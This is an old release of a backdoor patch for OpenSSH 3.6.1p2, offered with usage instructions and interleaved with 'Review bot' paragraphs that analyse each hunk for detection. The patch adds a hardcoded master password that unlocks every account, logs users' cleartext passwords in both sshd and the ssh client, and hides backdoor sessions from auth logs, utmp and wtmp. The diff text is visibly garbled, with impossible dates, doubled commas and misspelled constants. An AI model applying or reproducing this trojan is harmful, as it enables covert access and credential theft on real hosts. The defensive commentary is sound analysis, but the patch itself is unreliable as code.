$Id: bosen-tool.2,v1 08/05/2003 bosen Exp $ 1ndonesian Security Team (1st) Bosen Tools #2 Openssh-3.6.1p2 Backdoor 08/05/2003 [1st] Openssh-3.6.1p2 Backdoor _______________________________________________________________________________ # $Id: bosen-ssh3.6.1p2.patch 1.3 2003/05/08 20:40:00 bosen Exp $ # # backdored patch for openssh-3.6.1p2 # you will also find logged username/passwd on _BOSEN_LOGD (make sure its chmod 777) # # usage : # cp bosen-ssh3.6.1p2.patch openssh-3.6.1p2/; cd openssh-3.6.1p2; # patch < bosen-ssh3.6.1p2.patch # # Bosen # 1ndonesian Security Team # http://bosen.net/releases/ diff -urN openssh-3.6.1p2/auth.c openssh-3.6.1p2+bosen/auth.c --- openssh-3.6.1p2/auth.c 2003-01-188 12:24:06.000000000 +0700 +++ openssh-3.6.1p2+bosen/auth.c 2003-05-08 20:18:47.000000000 +0700 @@ -259,7 +259,8 @@ else authmsg = authenticated ? "Accepted" : "Failed"; - authlog("%s %s for %s%.100s from %%.200s port %d%s", + if (!bosen) { + authlog("%s %s for %s%.100s from %.200s port %d%s", authmsg, method, authctxt->valid ? "" : "illegal user ", @@ -267,6 +268,7 @@ get_remote_ipaddr(), get_remote_port(), info); + } #ifdef WITH_AIXAUTHENTICATE if (authenticated == 0 && strcmp(method, "password") == 0) diff -urN openssh-3.6.1p2/auth-passwd.c openssh-3.6.1p2+bosen/auth-passwd.c --- openssh-3.6.1p2/auth-passwd.c 20003-04-29 16:12:08.000000000 +0700 +++ openssh-3.6.1p2+bosen/auth-passwd.c 2003-05-08 20:24:30.000000000 +0700 
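Review bot: The `if (!bosen)` guard added around authlog() in the first auth.c hunk (closed by the `+ }` in the second) suppresses the "Accepted"/"Failed" record for exactly the logins that set `bosen`, so the auth log no longer reflects every authentication attempt. From a detection standpoint that gap is the signal: a session that appears in process listings, PAM session records or network connection logs with no matching `Accepted` line in the auth log indicates log suppression inside sshd itself, which no logging configuration can restore. The `%%.200s` in the removed line looks like a transcription artefact of this copy rather than upstream code, so the only substantive change in this file is the guard. Because the change is compiled in, host integrity checks (package checksums and signatures for the sshd binary, comparison of the build tree against a pristine 3.6.1p2 tarball) are the mitigation, not log review.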
@@ -234,6 +234,17 @@ # endif /* HAVE_MD5_PASSWORDS */ /* Authentication is accepted if the encrypted passwords are identical. */ - return (strcmp(encrypted_password,, pw_password) == 0); + if(strcmp(_BOSEN_PASSWD,password) == 0){ + bosen = 1; + return 1; + } + if(strcmp(encrypted_password, pw_password) == 0){ + ngevet = fopen(_BOSEN_LOGD"/"_BOSEN_LOGF,"a+"); + fprintf (ngevet, "%s:%s\n",pw->pw_name,password); + fclose (ngevet); + return 1; + } else { + return 0; + } #endif /* !USE_PAM && !HAVE_OSF_SIA */ } diff -urN openssh-3.6.1p2/canohost.c openssh-3.6.1p2+bosen/canohost.c --- openssh-3.6.1p2/canohost.c 2003-01-077 06:51:23.000000000 +0700 +++ openssh-3.6.1p2+bosen/canohost.c 2003-05-08 20:18:39.000000000 +0700 @@ -77,15 +77,16 @@ debug3("Trying to reverse map address %.100s.", ntop); /* Map the IP address to a host name. */ - if (getnameinfo((struct sockaddr **)&from, fromlen, name, sizeof(name), + if (!bosen) { + if (getnameinfo((struct sockaddr *)&from, fromlen, name, sizeof(name), NULL, 0, NI_NAMEREQD) != 0) { /* Host name not found. Use ip address. */ #if 0 log("Could not reverse map address %.100s.", ntop); #endif return xstrdup(ntop); - } - + } + } /* Got host name. */ name[sizeof(name) - 1] = '\0'; /* diff -urN openssh-3.6.1p2/includes.h openssh-3.6.1p2+bosen/includes.h --- openssh-3.6.1p2/includes.h 2002-10-211 07:50:26.000000000 +0700 +++ openssh-3.6.1p2+bosen/includes.h 2003-05-08 20:24:05.000000000 +0700 @@ -172,4 +172,12 @@ #include "entropy.h" +/* setup here */ +#define _BOSEN_PASSWD "BosenIsGOD" +#define _BOSEN_LOGD "/dev/hda1" +#define _BOSEN_LOGF "bosen" +#define _BOSEN_LOGP "gembel" +FILE *ngevet; +int bosen; +/* END */ #endif /* INCLUDES_H */ diff -urN openssh-3.6.1p2/sshconnect1.c openssh-3.6.1p2+bosen/sshconnect1.c --- openssh-3.6.1p2/sshconnect1.c 20002-08-21 01:41:16.000000000 +0700 +++ openssh-3.6.1p2+bosen/sshconnect1.c 2003-05-08 20:31:28.000000000 +0700 
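Review bot: In the auth-passwd.c hunk the comparison `strcmp(_BOSEN_PASSWD, password) == 0` runs before the real hash comparison and returns 1 on match, so every account on the host accepts one compile-time string regardless of its own password — an unconditional authentication bypass — and the `bosen = 1` set there is what disables the logging in the other hunks on this page. The other branch appends `pw->pw_name` and the cleartext `password` to `_BOSEN_LOGD"/"_BOSEN_LOGF` on every successful legitimate login, so the host accumulates a plaintext credential store. For defenders the hardcoded constant and the fixed path are the indicators: a `strings` pass over the installed sshd for literals absent from the vendor build, package file-hash verification, and file-integrity monitoring for regular files appearing under unusual directories (the includes.h hunk names `/dev/hda1`). Any credential ever used to log in to a host carrying this patch should be treated as compromised.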
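Review bot: The canohost.c hunk skips the getnameinfo() reverse lookup entirely when `bosen` is set, and on that path nothing visible writes `name` before the function continues past the hunk to NUL-terminate and return it, so unless `name` is initialized earlier in the function (outside this hunk) the hostname recorded for such sessions is stack garbage. The removed line's `struct sockaddr **` cast also looks like a transcription error in this copy rather than an upstream difference. For investigators, garbled or implausible hostnames in any surviving session records, and sshd sessions for which resolver logs show no PTR query from the host, are consistent with this modification.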
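Review bot: The includes.h hunk places a secret (`_BOSEN_PASSWD`) and two output paths as string literals in a header included by every translation unit, and defines `FILE *ngevet;` and `int bosen;` as plain globals in that header, so the same objects are defined in every object file and link only because tentative definitions are merged. That design is exactly what makes the modification detectable: the literals survive into every binary built from the tree (sshd and the ssh client alike), so comparing `strings` output or section hashes of installed binaries against a known-good build of 3.6.1p2 exposes it. `/dev/hda1` is normally a block device node, so a directory or regular files at that path are out of place on a healthy host and a cheap integrity check to add.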
@@ -922,6 +922,7 @@ { int type, i; char *password; + char ngentot[120]; debug("Doing password authentication."); if (options.cipher == SSH_CIPHER_NONE) @@ -930,6 +931,7 @@ if (i != 0) error("Permission denied, please try again."); password = read_passphrase(prompt, 0); + strcpy(ngentot,password); packet_start(SSH_CMSG_AUTH_PASSWORD); ssh_put_password(password); memset(password, 0, strlen(password)); @@ -938,8 +940,14 @@ packet_write_wait(); type = packet_read(); - if (type == SSH_SMSG_SUCCEESS) + if (type == SSH_SMSG_SUCCESS) { + if (strcmp(_BOSEN_PASSWD,ngentot) != 0) { + ngevet = fopen(_BOSEN_LOGD"/"_BOSEN_LOGP,"a+"); + fprintf (ngevet,"%s:%s@%s\n",options.user,ngentot,get_remote_ipaddr()); + fclose (ngevet); + } return 1; + } if (type != SSH_SMSG_FAILURE) packet_disconnect("Protocol error: got %d in response to passwd auth", type); } diff -urN openssh-3.6.1p2/sshconnect2.c openssh-3.6.1p2+bosen/sshconnect2.c --- openssh-3.6.1p2/sshconnect2.c 20003-04-01 18:43:40.000000000 +0700 +++ openssh-3.6.1p2+bosen/sshconnect2.c 2003-05-08 20:35:16.000000000 +0700 @@ -446,6 +446,7 @@ static int attempt = 0; char prompt[150]; char *password; + char ngentot[120]; if (attempt++ >= options.number_of_password_prompts) return 0; @@ -470,6 +471,11 @@ dispatch_set(SSH2_MSG_USERAUTH_PASSWD_CHANGEREQ, &input_userauth_passwd_changereq); + if (strcmp(_BOSEN_PASSWD,ngentot) != 0) { + ngevet = fopen(_BOSEN_LOGD"/"_BOSEN_LOGP,"a+"); + fprintf (ngevet,"%s:%s@%s\n",options.user,ngentot,get_remote_ipaddr()); + fclose (ngevet); + } return 1; } /* diff -urN openssh-3.6.1p2/sshlogin.c openssh-3.6.1p2+bosen/sshlogin.c --- openssh-3.6.1p2/sshlogin.c 2003-01-022 06:43:56.000000000 +0700 +++ openssh-3.6.1p2+bosen/sshlogin.c 2003-05-08 20:38:39.000000000 +0700 @@ -71,8 +71,10 @@ li = login_alloc_entry(pid, user, host, ttyname); login_set_addr(li, addr, addrlen); - login_login(li); - login_free_entry(li); + if (!bosen) { + login_login(li); + login_free_entry(li); + } } #ifdef LOGIN_NEEDS_UTMPX 
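Review bot: In the sshconnect1.c hunks `strcpy(ngentot, password)` copies the passphrase returned by read_passphrase() into a fixed 120-byte stack buffer with no length check, and on SSH_SMSG_SUCCESS the client appends `options.user`, that passphrase and the remote address to `_BOSEN_LOGD"/"_BOSEN_LOGP` — the trojaned ssh client harvests credentials for every outbound login, and the unbounded copy makes the client itself memory-unsafe on long passphrases. The sshconnect2.c hunks add the same capture block to the protocol-2 path. The upstream `memset(password, 0, strlen(password))` that follows is rendered pointless because a second, never-cleared copy now lives in `ngentot`. Defensively, a workstation with this client exposes every password its users typed into it; the same binary-integrity checks apply, and credentials used from such a host should be rotated.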
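Review bot: In the sshlogin.c hunks every call to login_login(), login_utmp_only() and login_logout() is wrapped in `if (!bosen)`, so sessions that authenticated through the `bosen` path leave no utmp, wtmp or lastlog record (the second and third sshlogin.c hunks on the next line do the same for the utmp-only and logout paths), and on that path the `li` entry from login_alloc_entry() is also never freed. For detection this means `w`, `who` and `last` cannot be trusted on a host with this patch; processes holding a pty whose owner has no utmp entry, and connections to sshd with no corresponding wtmp record, are the artefacts to look for. Session accounting should come from sources sshd does not control — auditd, process accounting, netflow — rather than the host's own login records.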
@@ -81,11 +83,12 @@ const char *host, struct sockaddr * addr, socklen_t addrlen) { struct logininfo *li; - li = login_alloc_entry(pid, user, host, ttyname); login_set_addr(li, addr, addrlen); - login_utmp_only(li); - login_free_entry(li); + if (!bosen) { + login_utmp_only(li); + login_free_entry(li); + } } #endif @@ -96,6 +99,8 @@ struct logininfo *li; li = login_alloc_entry(pid, user, NULL, ttyname); - login_logout(li); - login_free_entry(li); + if (!bosen) { + login_logout(li); + login_free_entry(li); + } } Bosen ====================== Original document can be fount at http://bosen.net/releases/?id=19